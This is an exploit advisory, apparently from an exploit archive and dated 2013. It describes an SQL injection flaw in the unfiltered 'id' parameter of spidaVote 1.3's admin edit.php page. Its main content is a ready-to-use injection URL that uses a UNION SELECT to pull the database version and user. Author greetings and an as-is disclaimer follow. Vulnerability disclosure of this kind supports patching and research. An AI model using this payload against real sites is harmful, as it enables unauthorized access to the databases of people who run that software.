# Exploit-Title: spidaVote 1.3 (id) SQL Injection Vulnerability
# Date: 2013-02-19
# Author: bd0rk
# Software-Link: http://www.spidanet.de/webmaster/download/spidaVote.zip
# Version: 1.3
# Category: web applications
# Google dork: n/a --->script-kiddieprotected
# Tested on: Microsoft Windows Vista
--------------------------------------------------------------------------
Vulnerable code infile /sv_admin/edit.php
Description: The $_GET-Parameter 'id' is not filtered and so an attacker
can inject some malicious mysql-code.
--------------------------------------------------------------------------
[+]Exploit: http://[target]/[spidaVote_path]/sv_admin/edit.php?id=%27/**+union+/**/select/**/+1,2,3,version(),user(),6/**/--+
Gr33tings, the 24 years old german Hacker bd0rk.
Contact: twitter.com/bd0rk
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
